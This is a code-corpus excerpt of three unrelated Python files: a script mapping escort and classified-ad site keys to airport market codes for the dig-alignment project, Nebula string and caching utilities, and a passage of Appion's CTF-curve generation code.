("Northern Michigan", "Michigan"): "TVC",
("Northern Mississippi", "Mississippi"): "TUP",
("Northern Virginia", "district of columbia"): "IAD",
("Northwest Connecticut", "Connecticut"): "DXR",
("Northwest Georgia", "Georgia"): "RMG",
("Ocala", "Florida"): "OCF",
("Odessa", "Texas"): "MAF",
("Ogden", "Utah"): "OGD",
("Oklahoma City", "Oklahoma"): "OKC",
("Olympia", "Washington"): "TCM",
("Omaha", "Nebraska"): "OMA",
("Oneonta", "New York"): "ONH",
("Orange County", "California"): "SNA",
("Oregon Coast", "Oregon"): "ONP",
("Orlando", "Florida"): "MCO",
("Ottawa", "Ontario"): "YOW",
("Ottumwa", "Iowa"): "OTM",
("Outer Banks", "North Carolina"): "FFA",
("Owen Sound", "Ontario"): "YOS",
("Owensboro", "Kentucky"): "OWB",
("Oxford", "Uk"): "OXF",
("Palmdale", "California"): "PMD",
("Palms Prings", "California"): "PSP",
("Panama City", "Florida"): "PFN",
("Parkersburg", "West Virginia"): "PKB",
("Pennstate", "Pennsylvania"): "UNV",
("Pensacola", "Florida"): "PNS",
("Peoria", "Illinois"): "PIA",
("Perth", "Australia"): "PER",
("Peterborough", "Ontario"): "YPQ",
("Philadelphia", "Pennsylvania"): "PHL",
("Phoenix", "Arizona"): "PHX",
("Pittsburgh", "Pennsylvania"): "PIT",
("Plattsburgh", "New York"): "PBG",
("Poconos", "Pennsylvania"): "MPO",
("Port Huron", "Michigan"): "PHN",
("Portland", "Oregon"): "PDX",
("Portsmouth", "Maine"): "PWM",
("Portsmouth", "Virginia"): "ORF",
("Potsdam", "New York"): "MSS",
("Prescott", "Arizona"): "PRC",
("Prince George", "British Columbia"): "YXS",
("Provo", "Utah"): "PVU",
("Pueblo", "Colorado"): "PUB",
("Puerto Rico", "Puerto Rico"): "SJU",
("Pullman", "Washington"): "PUW",
("Quad Cities", "Iowa"): "MLI",
("Quebec", "Quebec"): "YQB",
("Quincy", "Illinois"): "UIN",
("Racine", "Wisconsin"): "RAC",
("Raleigh", "North Carolina"): "RDU",
("Reading", "Pennsylvania"): "RDG",
("Red Deer", "Alberta"): "YQF",
("Redding", "California"): "RDD",
("Reno", "Nevada"): "RNO",
("Richmond", "Virginia"): "RIC",
("Riverside", "California"): "ONT",
("Roanoke", "Virginia"): "ROA",
("Rochester", "New York"): "ROC",
("Rockford", "Illinois"): "RFD",
("Rockies", "Colorado"): "EGE",
("Roseburg", "Oregon"): "RBG",
("ST. Augustine", "Florida"): "UST",
("Sacramento", "California"): "SMF",
("Saginaw", "Michigan"): "MBS",
("Salem", "North Carolina"): "INT",
("Salem", "Oregon"): "SLE",
("Salt Lake City", "Utah"): "SLC",
("San Antonio", "Texas"): "SAT",
("San Bernardino", "California"): "ONT",
("San Diego", "California"): "SAN",
("San Fernando", "California"): "BUR",
("San Francisco", "California"): "SFO",
("San Jose", "California"): "SJC",
("San Luis Obispo", "California"): "SBP",
("San Marcos", "Texas"): "HYI",
("Sandusky", "Ohio"): "SKY",
("Santa Barbara", "California"): "SBA",
("Santa Cruz", "California"): "WVI",
("Santa Maria", "California"): "SMX",
("Santafe", "New Mexico"): "SAF",
("Sarasota", "Florida"): "SRQ",
("Sarnia", "Ontario"): "YZR",
("Saskatoon", "Saskatchewan"): "YXE",
("Sault", "Ontario"): "YAM",
("Savannah", "Georgia"): "SAV",
("Scotts Bluff", "Nebraska"): "BFF",
("Scranton", "Pennsylvania"): "AVP",
("Seattle", "Washington"): "SEA",
("Sheboygan", "Wisconsin"): "SBM",
("Sheffield", "Uk"): "DSA",
("Shoals", "Alabama"): "MSL",
("Showlow", "Arizona"): "SOW",
("Shreveport", "Louisiana"): "SHV",
("Sierra Vista", "Arizona"): "FHU",
("Sioux City", "Iowa"): "SUX",
("Siskiyou", "California"): "SIY",
("Skeena", "British Columbia"): "YYD",
("South Bend", "Indiana"): "SBN",
("South Coast", "Massachusetts"): "EWB",
("South Jersey", "New Jersey"): "MIV",
("Southeast Missouri", "Missouri"): "CGI",
("Southern Maryland", "district of columbia"): "2W6",
("Southwest Michigan", "Michigan"): "BEH",
("Southwest Virginia", "Virginia"): "MKJ",
("Space Coast", "Florida"): "TIX",
("Spokane", "Washington"): "GEG",
("Springfield", "Massachusetts"): "CEF",
("Springfield", "Missouri"): "SGF",
("St Cloud", "Minnesota"): "STC",
("St George", "Utah"): "SGU",
("St Joseph", "Missouri"): "STJ",
("St Louis", "Missouri"): "STL",
("St Paul", "Minnesota"): "MSP",
("Statesboro", "Georgia"): "TBR",
("Stillwater", "Oklahoma"): "SWO",
("Sudbury", "Ontario"): "YSB",
("Suffolk", "Virginia"): "ORF",
("Sunshine", "British Columbia"): "YHS",
("Susanville", "California"): "SVE",
("Sydney", "Australia"): "SYD",
("Syracuse", "New York"): "SYR",
("Tacoma", "Washington"): "TCM",
("Tallahassee", "Florida"): "TLH",
("Tampa", "Florida"): "TPA",
("Terre Haute", "Indiana"): "HUF",
("Texarkana", "Texas"): "TXK",
("Texoma", "Texas"): "GYI",
("Thunderbay", "Ontario"): "YQT",
("Toledo", "Ohio"): "TOL",
("Topeka", "Kansas"): "FOE",
("Toronto", "Ontario"): "YYZ",
("Treasure Coast", "Florida"): "VRB",
("Tri-cities", "Washington"): "PSC",
("Trois Rivieres", "Quebec"): "YRQ",
("Tucson", "Arizona"): "TUS",
("Tulsa", "Oklahoma"): "TUL",
("Tuscaloosa", "Alabama"): "TCL",
("Tuscarawas", "Ohio"): "PHD",
("Twin Falls", "Idaho"): "TWF",
("Twintiers", "New York"): "OLE",
("Tyler", "Texas"): "TYR",
("Upper Peninsula", "Michigan"): "MQT",
("Utica", "New York"): "UCA",
("Valdosta", "Georgia"): "VLD",
("Vancouver", "British Columbia"): "YVR",
("Ventura", "California"): "OXR",
("Victoria", "British Columbia"): "YYJ",
("Virginia Beach", "Virginia"): "ORF",
("Visalia", "California"): "VIS",
("Waco", "Texas"): "ACT",
("Wales", "Uk"): "CWL",
("Washington DC", "district of columbia"): "IAD",
("Waterloo", "Iowa"): "ALO",
("Watertown", "New York"): "ART",
("Wausau", "Wisconsin"): "AUW",
("Wenatchee", "Washington"): "EAT",
("West Kentucky", "Kentucky"): "PAH",
("West Palm Beach", "Florida"): "PBI",
("West Slope", "Colorado"): "GJT",
("Western Maryland", "Maryland"): "CBE",
("Wheeling", "West Virginia"): "HLG",
("Whistler", "British Columbia"): "YWS",
("Wichita Falls", "Texas"): "SPS",
("Wichita", "Kansas"): "ICT",
("Williamsport", "Pennsylvania"): "IPT",
("Wilmington", "North Carolina"): "ILG",
("Windsor", "Ontario"): "YQG",
("Worcester", "Massachusetts"): "ORH",
("Yakima", "Washington"): "YKM",
("York", "Pennsylvania"): "THV",
("Youngstown", "Ohio"): "YNG",
("Yuma", "Arizona"): "YUM",
("Zanesville", "Ohio"): "ZZV",
("Albany", "Georgia"): "ABY",
("Athens", "Georgia"): "AHN",
("Baton Rouge", "Lousiana"): "BTR",
("Bloomington", "Illinois"): "BMI",
("Columbus", "Georgia"): "CSG",
("Cumberland Valley", "Pennsylvania"): "N68",
("Fayetteville", "Arkansas"): "XNA",
("Jackson", "Michigan"): "JXN",
("Lafayette", "Indiana"): "LAF",
("Lake Charles", "Lousiana"): "LCH",
("Monroe", "Lousiana"): "MLU",
("Monroe", "louisiana"): "MLU",
("New Orleans", "Lousiana"): "MSY",
("Regina", "Saskatchewan"): "YQR",
("Richmond", "Indiana"): "RID",
("Rochester", "Minnesota"): "RST",
("Saguenay", "Quebec"): "YBG",
("Sherbrooke", "Quebec"): "YSC",
("Shreveport", "Lousiana"): "SHV",
("Southern West Virgin", "West Virginia"): "BKW",
("Springfield", "Illinois"): "SPI",
("Victoria", "Texas"): "VCT"}
# escortsinca_sitekey_to_marketid
# Alias (same dict object as escortadsxxx), not an independent copy.
escortsinca_sitekey_to_marketid = escortadsxxx_sitekey_to_marketid
# escortsintheus_sitekey_to_marketid
# Alias (same dict object as escortadsxxx), not an independent copy.
escortsintheus_sitekey_to_marketid = escortadsxxx_sitekey_to_marketid
# liveescortreviews_sitekey_to_marketid
liveescortreviews_sitekey_to_marketid = {
"akron": "CAK",
"albany": "ALB",
"albuquerque": "ABQ",
"anchorage": "ANC",
"atlanta": "ATL",
"austin": "AUS",
"baltimore": "BWI",
"batonrouge": "BTR",
"birmingham": "BHM",
"boston": "BOS",
"bronx": "JFK",
"brooklyn": "JFK",
"buffalo": "BUF",
"burlington": "BTV",
"calgary": "YYC",
"centraljersey": "47N",
"charleston": "CHS",
"charlotte": "CLT",
"chattanooga": "CHA",
"chesapeake": "ORF",
"chicago": "ORD",
"cincinnati": "CVG",
"cleveland": "CLE",
"coloradosprings": "COS",
"columbia": "CAE",
"columbus": "CMH",
"daytona": "DAB",
"delaware": "ILG",
"denver": "DEN",
"desmoines": "DSM",
"detroit": "DTW",
"eastbay": "OAK",
"edmonton": "YEG",
"everett": "PAE",
"fairfield": "HVN",
"fortmyers": "RSW",
"ftlauderdale": "FLL",
"greensboro": "GSO",
"greenville": "GSP",
"hamilton": "YHM",
"hartford": "HFD",
"honolulu": "HNL",
"houston": "IAH",
"hudsonvalley": "SWF",
"huntsville": "HSV",
"indianapolis": "IND",
"inlandempire": "ONT",
"jacksonville": "JAX",
"jerseyshore": "ACY",
"kc": "MCI",
"knoxville": "TYS",
"lasvegas": "LAS",
"lexington": "LEX",
"littlerock": "LIT",
"longbeach": "LGB",
"longisland": "ISP",
"losangeles": "LAX",
"louisville": "SDF",
"madison": "MSN",
"maine": "PWM",
"manhattan": "JFK",
"memphis": "MEM",
"miami": "MIA",
"milwaukee": "MKE",
"minneapolis": "MSP",
"minot": "MOT",
"montreal": "YUL",
"myrtlebeach": "MYR",
"nashville": "BNA",
"newhampshire": "MHT",
"newhaven": "HVN",
"newlondon": "GON",
"neworleans": "MSY",
"norfolk": "ORF",
"northbay": "STS",
"northeasttexas": "DFW",
"northjersey": "EWR",
"nova": "IAD",
"oklahomacity": "OKC",
"omaha": "OMA",
"orangecounty": "SNA",
"orlando": "MCO",
"ottawa": "YOW",
"palmdale": "PMD",
"palmsprings": "PSP",
"panamacity": "PFN",
"pensacola": "PNS",
"philadelphia": "PHL",
"phoenix": "PHX",
"pittsburgh": "PIT",
"portland": "PDX",
"providence": "PVD",
"queens": "JFK",
"raleigh": "RDU",
"reno": "RNO",
"richmond": "RIC",
"sacramento": "SMF",
"saltlakecity": "SLC",
"sanantonio": "SAT",
"sandiego": "SAN",
"sanfernandovalley": "BUR",
"sangabrielvalley": "EMT",
"sanjose": "SJC",
"santabarbara": "SBA",
"sarasota": "SRQ",
"saskatoon": "YXE",
"seattle": "SEA",
"sf": "SFO",
"southbend": "SBN",
"southcoast": "EWB",
"southernmaryland": "2W6",
"southjersey": "MIV",
"spacecoast": "TIX",
"statenisland": "JFK",
"stlouis": "STL",
"syracuse": "SYR",
"tacoma": "TCM",
"tampa": "TPA",
"toronto": "YYZ",
"tucson": "TUS",
"tulsa": "TUL",
"vancouver": "YVR",
"ventura": "OXR",
"virginiabeach": "ORF",
"washingtondc": "IAD",
"westchester": "HPN",
"westpalmbeach": "PBI",
"westvirginia": "CRW",
"wichita": "ICT",
"winnipeg": "YWG",
"worcester": "ORH"}
# Build a flat list of [sourcemarket_uri, market_uri] pairs from every
# site's sitekey->IATA-code mapping above.  The sitekey is encoded into
# the sourcemarket URI path; the market URI carries the IATA/market id.
l = []
# backpage: sitekey is already a URL-safe token taken from the url
for k,v in backpage_sitekey_to_marketid.iteritems():
    l.append(['http://dig.isi.edu/sourcemarket/backpage/%s' % (k), 'http://dig.isi.edu/market/%s' % v])
# craigslist: sitekey taken from the url
for k,v in craigslist_sitekey_to_marketid.iteritems():
    l.append(['http://dig.isi.edu/sourcemarket/craigslist/%s' % (k), 'http://dig.isi.edu/market/%s' %v])
# classivox: sitekey taken from the url
for k,v in classivox_sitekey_to_marketid.iteritems():
    l.append(['http://dig.isi.edu/sourcemarket/classivox/%s' % (k), 'http://dig.isi.edu/market/%s' %v])
# myproviderguide: sitekey taken from the url
for k,v in myproviderguide_sitekey_to_marketid.iteritems():
    l.append(['http://dig.isi.edu/sourcemarket/myproviderguide/%s' % (k), 'http://dig.isi.edu/market/%s' %v])
# naughtyreviews: key is a 1-, 2-, or 3-tuple from the url; joined with '/'
for k,v in naughtyreviews_sitekey_to_marketid.iteritems():
    l.append(['http://dig.isi.edu/sourcemarket/naughtyreviews/%s' % ('/'.join(k)), 'http://dig.isi.edu/market/%s' %v])
# cityvibe: sitekey taken from the url
for k,v in cityvibe_sitekey_to_marketid.iteritems():
    l.append(['http://dig.isi.edu/sourcemarket/cityvibe/%s' % (k), 'http://dig.isi.edu/market/%s' %v])
# escortsincollege: key is a "City, State" string from the page title;
# the comma becomes a path separator and spaces are stripped
for k,v in escortsincollege_sitekey_to_marketid.iteritems():
    l.append(['http://dig.isi.edu/sourcemarket/escortsincollege/%s' % (k.replace(',','/').replace(' ','')), 'http://dig.isi.edu/market/%s' %v])
# escortphonelist: key is a "City, State" string from the page title
for k,v in escortphonelist_sitekey_to_marketid.iteritems():
    l.append(['http://dig.isi.edu/sourcemarket/escortphonelist/%s' % (k.replace(',','/').replace(' ','')), 'http://dig.isi.edu/market/%s' %v])
# eroticmugshots: sitekey taken from the url
for k,v in eroticmugshots_sitekey_to_marketid.iteritems():
    l.append(['http://dig.isi.edu/sourcemarket/eroticmugshots/%s' % (k), 'http://dig.isi.edu/market/%s' %v])
# massagetroll: sitekey taken from the url
# NOTE(review): this loop emits 'eroticmugshots' in the sourcemarket URI
# path even though it iterates the massagetroll mapping -- looks like a
# copy-paste slip ('massagetroll' expected); confirm before changing.
for k,v in massagetroll_sitekey_to_marketid.iteritems():
    l.append(['http://dig.isi.edu/sourcemarket/eroticmugshots/%s' % (k), 'http://dig.isi.edu/market/%s' %v])
# escortadsxxx: key is a ('City', 'State') 2-tuple from columns city, state
for k,v in escortadsxxx_sitekey_to_marketid.iteritems():
    l.append(['http://dig.isi.edu/sourcemarket/escortadsxxx/%s/%s' % (k[0].replace(' ',''), k[1].replace(' ','')), 'http://dig.isi.edu/market/%s' %v])
# escortsinca: key is a ('City', 'State') 2-tuple from columns city, state
for k,v in escortsinca_sitekey_to_marketid.iteritems():
    l.append(['http://dig.isi.edu/sourcemarket/escortsinca/%s/%s' % (k[0].replace(' ',''), k[1].replace(' ','')), 'http://dig.isi.edu/market/%s' %v])
# escortsintheus: key is a ('City', 'State') 2-tuple from columns city, state
for k,v in escortsintheus_sitekey_to_marketid.iteritems():
    l.append(['http://dig.isi.edu/sourcemarket/escortsintheus/%s/%s' % (k[0].replace(' ',''), k[1].replace(' ','')), 'http://dig.isi.edu/market/%s' %v])
# liveescortreviews: sitekey taken from the url
for k,v in liveescortreviews_sitekey_to_marketid.iteritems():
    l.append(['http://dig.isi.edu/sourcemarket/liveescortreviews/%s' % (k), 'http://dig.isi.edu/market/%s' %v])
import json
# Serialize the accumulated [sourcemarket_uri, market_uri] pairs to
# sitekeymappings2.json.  The surrounding '[' / ']' and the separating
# commas are emitted by hand around json.dump so the file ends up as one
# JSON array of pretty-printed objects.
with open('sitekeymappings2.json', 'w') as f:
    print >> f, '['
    # k counts down so we can suppress the comma after the last element
    k = len(l)
    for row in l:
        sourcemarket_uri = row[0]
        # leftover debug output to stdout (not part of the JSON file)
        print type(sourcemarket_uri)
        market_uri = row[1]
        d = {'sourcemarket_uri': sourcemarket_uri,
             'market_uri': market_uri}
        json.dump(d, f, indent=4)
        k -= 1
        if k>0:
            print >> f, ","
        else:
            print >> f
    print >> f, ']'
| usc-isi-i2/dig-alignment | versions/1.0/datasets/istr/market/sourcemarket.py | Python | apache-2.0 | 249,792 | [
"COLUMBUS"
] | 6d3567468c987f1369893fff957ad0294f28956b40e6d9cfdfd272c1a11aaa7a |
import re
from nxtools import *
from .common import *
def shorten(instr, nlen):
    """Return the first line of *instr*, truncated to *nlen* characters.

    Lines no longer than *nlen* are returned unchanged; longer ones are
    cut to *nlen* characters and suffixed with "...".
    """
    line = instr.split("\n")[0]
    # BUG FIX: the threshold was a hard-coded 100, so lines of length
    # nlen..99 were returned untruncated despite the nlen argument.
    if len(line) <= nlen:
        return line
    return line[:nlen] + "..."
def filter_match(f, r):
    """Match string *r* against filter *f*.

    *f* may be a single regex pattern or a list/tuple of patterns; for a
    collection the result is True if any pattern matches (logical OR,
    short-circuiting on the first hit).  Matching uses re.match, i.e.
    patterns are anchored at the start of *r*.  For a single pattern the
    raw re.match result (match object or None) is returned.
    """
    if isinstance(f, (list, tuple)):
        # Removed an unused `res` local; any() expresses the OR directly.
        return any(re.match(fl, r) for fl in f)
    return re.match(f, r)
def tree_indent(data):
    """Annotate a flat, ordered list of option dicts with tree structure.

    Each row's "value" is a dotted path (e.g. "a.b.c").  For every row this
    sets "indent" (nesting depth, 0 for roots) and "role" ("header" for
    rows that have children, "option" otherwise); rows whose existing role
    is "label" or "hidden" are left alone.  Parents are located by scanning
    backwards, so rows must be ordered parents-before-children.  *data* is
    mutated in place; nothing is returned.
    """
    has_children = False
    for i, row in enumerate(data):
        value = row["value"]
        # (removed an unused `depth` local that was computed here)
        parentindex = None
        # closest preceding row whose value is a dotted prefix is the parent
        for j in range(i - 1, -1, -1):
            if value.startswith(data[j]["value"] + "."):
                parentindex = j
                data[j]["has_children"] = True
                break
        if parentindex is None:
            data[i]["indent"] = 0
            continue
        has_children = True
        data[i]["indent"] = data[parentindex]["indent"] + 1

    # second pass: assign roles once we know whether any row has children
    for i, row in enumerate(data):
        role = row.get("role", "option")
        if role in ["label", "hidden"]:
            continue
        elif has_children and row.get("has_children"):
            data[i]["role"] = "header"
        else:
            data[i]["role"] = "option"
#
# CS Caching
#
class CachedObject(type):
    """Metaclass that memoizes instances keyed by their positional args.

    A class using this metaclass returns the cached instance when called
    again with the same ``*args``; the cache dict is created lazily on the
    class itself the first time it is instantiated.
    """
    # class-level default; __call__ shadows it with a per-class dict
    _cache = None
    @classmethod
    def clear_cache(cls):
        # NOTE(review): as a classmethod of the *metaclass*, ``cls`` here is
        # CachedObject itself, so this resets only the metaclass-level
        # attribute.  Per-class cache dicts created in __call__ (set on each
        # concrete class) are not removed by this call — confirm intended.
        cls._cache = None
    def __call__(cls, *args):
        # lazily create this class's own cache (shadows the class attribute)
        if not cls._cache:
            cls._cache = {}
        key = tuple(args)
        if key not in cls._cache:
            # cache miss: construct normally and remember the instance
            cls._cache[key] = super().__call__(*args)
        return cls._cache[key]
# Moved to metadata, but this stub needs to live here so older firefly
# doesn't break.
def clear_cs_cache():
    """Backwards-compatible shim: delegate to metadata.clear_cs_cache().

    The import is local to avoid a circular import at module load time.
    """
    from . import metadata
    metadata.clear_cs_cache()
| immstudios/nebula-core | nebulacore/meta_utils.py | Python | gpl-3.0 | 1,789 | [
"Firefly"
] | 5a2aeecdac7ae3aba2a96ecbaf89f95ced9dcb283ff3fe568177f1285e6e1e85 |
#!/usr/bin/env python
import time
import math
import numpy
from appionlib import apDisplay
from appionlib.apCtf import ctftools
debug = False
#===================
def generateCTF1d(radii=None, focus=1.0e-6, cs=2e-3, volts=120000, ampconst=0.07,
		failParams=False, overfocus=False):
	"""
	calculates a 1D CTF curve (returned squared, so always positive)

	radii -- numpy array of spatial frequencies (1/m); a default
		256-point array at 1 Angstrom/pixel is generated when None
	focus -- defocus in meters; underfocus is positive (defocused)
	cs -- spherical aberration in meters
	volts -- accelerating voltage in volts
	ampconst -- amplitude contrast fraction (0..1)
	failParams -- if True, atypical microscope values raise an error
	overfocus -- if True, interpret focus as overfocus

	Use SI units: meters, radians, volts
	"""
	if debug is True:
		print "generateCTF1dFromRadii()"
	if radii is None:
		radii = generateRadii1d(numpoints=256, pixelsize=1e-10)
	if debug is True:
		apDisplay.printColor("generateCTF radii: 1/%.2fA --> 1/%.2fA"%(1/radii[1]*1e10, 1/radii[-1]*1e10), "cyan")
	t0 = time.time()
	checkParams(focus1=focus, focus2=focus, cs=cs, volts=volts, ampconst=ampconst, failParams=failParams)
	lamb = ctftools.getTEMLambda(volts)
	s = radii
	pi = math.pi
	if overfocus is True:
		focus = -1.0*focus
	# wave aberration: gamma = -(pi/2)*Cs*lambda^3*s^4 + pi*df*lambda*s^2
	gamma = -0.5*pi*cs*(lamb**3)*(s**4) + pi*focus*lamb*(s**2)
	if overfocus is True:
		gamma = -1.0*gamma
	# amplitude (A) and phase (B) contrast weights; A^2 + B^2 = 1
	A = ampconst
	B = math.sqrt(1.0 - ampconst**2)
	prectf = A*numpy.cos(gamma) + B*numpy.sin(gamma)
	ctf = prectf**2
	if debug is True:
		print "generate 1D ctf complete in %.9f sec"%(time.time()-t0)
	return ctf
#===================
def getDiffResForOverfocus(radii=None, cs=2e-3, volts=120000):
	"""
	given Cs and kV, determine the initial resolution where the difference between
	overfocus and underfocus is clearly visible.

	radii -- numpy array of spatial frequencies (1/m); must be provided
	cs -- spherical aberration in meters
	volts -- accelerating voltage in volts

	value returned in Angstroms, but radii must be in meters
	"""
	if debug is True:
		print "getDiffResForOverfocus()"
	if debug is True:
		apDisplay.printColor("getDiffRes radii: 1/%.2fA --> 1/%.2fA"%(1/radii[1]*1e10, 1/radii[-1]*1e10), "cyan")
	t0 = time.time()
	checkParams(focus1=1.0e-6, focus2=1.0e-6, cs=cs, volts=volts, ampconst=0.0, failParams=False)
	lamb = ctftools.getTEMLambda(volts)
	s = radii
	pi = math.pi
	# Cs term of the wave aberration only (the defocus term cancels when
	# comparing over- vs under-focus)
	csgamma = 2*pi*0.25*cs*(lamb**3)*(s**4)
	#over/under-focus difference is visible when Cs component is greater than 0.05
	# NOTE(review): the comment above says 0.05 but the code searches for
	# 0.03 -- confirm which threshold is intended.
	# csgamma grows monotonically with s, so searchsorted finds the crossing
	index = numpy.searchsorted(csgamma, 0.03)
	diffres = 1.0/radii[index-1]*1e10
	apDisplay.printColor("Overfocus/Underfocus difference resolution is: 1/%.2fA"%(diffres), "cyan")
	if debug is True:
		print "difference resolution complete in %.9f sec"%(time.time()-t0)
	return diffres
#===================
def generateCTF1dACE2(radii=None, focus=1.0e-6, cs=2e-3, volts=120000, ampconst=0.07, failParams=False):
	"""
	calculates a 1D CTF curve in the ACE2 formulation (sin form, squared)

	radii -- numpy array of spatial frequencies (1/m); must be provided
	focus -- defocus in meters; underfocus is positive (defocused)
	cs -- spherical aberration in meters
	volts -- accelerating voltage in volts
	ampconst -- amplitude contrast fraction
	failParams -- if True, atypical microscope values raise an error

	Use SI units: meters, radians, volts
	"""
	if debug is True:
		print "generateCTF1dFromRadii()"
	t0 = time.time()
	checkParams(focus1=focus, focus2=focus, cs=cs, volts=volts, ampconst=ampconst, failParams=failParams)
	# sanity-check the resolution range implied by the radii (Angstroms)
	minres = 1e10/radii.min()
	maxres = 1e10/radii.max()
	if debug is True:
		print "** CTF limits %.1f A -->> %.1fA"%(minres, maxres)
	if maxres < 2.0 or maxres > 50.0:
		apDisplay.printError("CTF limits are incorrect %.1f A -->> %.1fA"%(minres, maxres))
	wavelength = ctftools.getTEMLambda(volts)
	# coefficients of gamma as a polynomial in s^2:
	#   gamma = x4*(s^2)^2 - focus*x2*(s^2) + x0
	x4 = math.pi/2.0 * wavelength**3 * cs
	x2 = math.pi * wavelength
	x0 = 1.0*math.asin(ampconst) #CORRECT
	if debug is True:
		print "x0 shift %.1f degrees"%(math.degrees(x0))
	radiisq = radii**2
	gamma = (x4 * radiisq**2) + (-focus * x2 * radiisq) + (x0)
	#ctf = -1.0*numpy.cos(gamma) #WRONG
	#ctf = -1.0*numpy.sin(gamma) #CORRECT
	ctf = 1.0*numpy.sin(gamma) #MAYBE CORRECT
	if debug is True:
		print "generate 1D ctf complete in %.9f sec"%(time.time()-t0)
	return ctf**2
#===================
def generateCTF1dMakePoints(numpoints=256, focus=1.0e-6,
pixelsize=1.5e-10, cs=2e-3, volts=120000, ampconst=0.07):
"""
calculates a CTF function based on the input details
Use SI units: meters, radians, volts
Underfocus is postive (defocused)
"""
if debug is True:
print "generateCTF1d()"
checkParams(focus1=focus, focus2=focus, pixelsize=pixelsize, cs=cs,
volts=volts, ampconst=ampconst)
radii = generateRadii1d(numpoints, pixelsize)
ctf = generateCTF1dFromRadii(radii, focus, cs, volts, ampconst)
return ctf
#===================
def generateRadii1d(numpoints=256, pixelsize=1e-10):
	"""Return evenly spaced spatial frequencies 0, df, 2*df, ...

	For a 1D transform of ``numpoints`` samples at ``pixelsize`` (meters),
	the frequency step is df = 1/(numpoints*pixelsize); the result is a
	numpy array of length ``numpoints``.
	"""
	step = 1.0/( numpoints*pixelsize )
	return numpy.arange(numpoints) * step
#===================
def generateCTF2d(focus1=-1.0e-6, focus2=-1.0e-6, theta=0.0,
		shape=(256,256), pixelsize=1.0e-10, cs=2e-3, volts=120000, ampconst=0.000):
	"""
	calculates an astigmatic 2D CTF function based on the input details

	focus1/focus2 -- defocus along the two astigmatism axes (meters)
	theta -- astigmatism angle (radians)
	shape -- (rows, cols) of the output array
	pixelsize -- pixel size in meters
	cs -- spherical aberration in meters
	volts -- accelerating voltage in volts
	ampconst -- amplitude contrast fraction

	Use SI units: meters, radians, volts
	Underfocus is positive (defocused)

	NOTE(review): getTEMLambda, circle and imagefile are not defined or
	imported in this module (getTEMLambda presumably should be
	ctftools.getTEMLambda); as written, calling this raises NameError.
	Also writes a debug image "gauss2.jpg" as a side effect.
	"""
	t0 = time.time()
	wavelength = getTEMLambda(volts)
	xfreq = 1.0/( (shape[1]-1)*2.*pixelsize )
	yfreq = 1.0/( (shape[0]-1)*2.*pixelsize )
	ctf = numpy.zeros(shape, dtype=numpy.float64)
	# mean defocus plus half the astigmatic difference
	meanfocus = (focus1 + focus2) / 2.
	focusdiff = (focus1 - focus2) / 2.
	t1 = math.pi * wavelength
	t2 = wavelength**2 * cs / 2.0
	t3 = -1.0*math.asin(ampconst)
	radiisq = circle.generateRadial1d(shape, xfreq, yfreq)
	angles = -circle.generateAngular2d(shape, xfreq, yfreq)
	# astigmatism: the local defocus oscillates with twice the polar angle
	localfocus = meanfocus + focusdiff * numpy.cos(2.0*(angles-theta))
	gamma = t1*radiisq * (-localfocus + t2*radiisq) + t3
	ctf = numpy.sin(gamma)
	gauss = circle.generateGaussion2d(shape)
	imagefile.arrayToJpeg(gauss, "gauss2.jpg")
	if debug is True:
		print "generate ctf 2d complete in %.4f sec"%(time.time()-t0)
	return ctf*gauss
#===================
def generateAngular2d(shape, xfreq, yfreq):
	"""
	build a full 2D array of polar angles by computing one quadrant and
	mirroring it (with sign flips) into the other three;
	this method is about 2x faster than method 1

	NOTE(review): depends on an Angular class that is not defined in this
	module; as written, calling this raises NameError.
	"""
	t0 = time.time()
	if shape[0] % 2 != 0 or shape[1] % 2 != 0:
		apDisplay.printError("array shape for radial function must be even")
	halfshape = numpy.array(shape)/2.0
	a = Angular(halfshape, xfreq, yfreq, center=False, flip=False)
	angular1 = a.angular
	b = Angular(halfshape, xfreq, yfreq, center=False, flip=True)
	angular2 = numpy.fliplr(b.angular)
	# stitch the four quadrants together; signs encode the quadrant
	circular = numpy.vstack(
		(numpy.hstack(
			(numpy.flipud(angular2), -numpy.flipud(angular1))
		),numpy.hstack(
			(-angular2, angular1),
		)))
	### raw radius from center
	#print numpy.around(circular*180/math.pi,1)
	print "angular 2 complete in %.4f sec"%(time.time()-t0)
	return circular
#===================
def generateGaussion2d(shape, sigma=None):
	"""
	build a 2D Gaussian falloff (note the historic misspelling in the
	name) from a radial-distance array;
	this method is about 4x faster than method 1

	sigma defaults to mean(shape)/4

	NOTE(review): calls generateRadial2(), which does not exist in this
	module -- generateRadial2d() is the closest match, but it takes extra
	frequency arguments; as written, calling this raises NameError.
	"""
	t0 = time.time()
	if sigma is None:
		sigma = numpy.mean(shape)/4.0
	circular = generateRadial2(shape)
	circular = numpy.exp(-circular/sigma**2)
	print "gaussian 2 complete in %.4f sec"%(time.time()-t0)
	return circular
#===================
class Radial(object):
	"""Builds a 2D array of squared, frequency-weighted radii.

	The grid covers ``shape`` pixels.  With center=True distances are
	measured from the array midpoint; otherwise from just outside the
	upper-left corner.  The computed array is exposed as the ``radial``
	attribute.
	"""
	def __init__(self, shape, xfreq=1.0, yfreq=1.0, center=True):
		if center is True:
			### measure from the array midpoint
			self.center = numpy.array(shape, dtype=numpy.float64)/2.0 - 0.5
		else:
			### measure from just outside the upper-left edge
			self.center = (-0.5, -0.5)
		self.xfreqsq = xfreq**2
		self.yfreqsq = yfreq**2
		# evaluate distance() over every (row, col) index pair
		self.radial = numpy.fromfunction(self.distance, shape, dtype=numpy.float64)
	def distance(self, y, x):
		"""Return the squared radius of pixel (y, x), weighted by freq**2."""
		dx = (x - self.center[1])**2 * self.xfreqsq
		dy = (y - self.center[0])**2 * self.yfreqsq
		return dx + dy
#===================
def generateRadial2d(shape, xfreq, yfreq):
	"""
	build a full 2D array of squared, frequency-weighted radii measured
	from the array center by computing one quadrant and mirroring it;
	this method is about 4x faster than method 1

	NOTE(review): halfshape is a float array (numpy.array(shape)/2.0) but
	is passed as the shape argument of numpy.fromfunction inside Radial;
	modern numpy expects integer dimensions -- confirm this still works.
	"""
	t0 = time.time()
	if shape[0] % 2 != 0 or shape[1] % 2 != 0:
		apDisplay.printError("array shape for radial function must be even")
	halfshape = numpy.array(shape)/2.0
	#radial = numpy.fromfunction(radiusfunc, halfshape)
	# compute one quadrant anchored just outside the upper-left edge...
	r = Radial(halfshape, xfreq, yfreq, center=False)
	radial = r.radial
	# ...and mirror it into the other three quadrants
	circular = numpy.vstack(
		(numpy.hstack(
			(numpy.fliplr(numpy.flipud(radial)), numpy.flipud(radial))
		),numpy.hstack(
			(numpy.fliplr(radial), radial),
		)))
	### raw radius from center
	#print circular
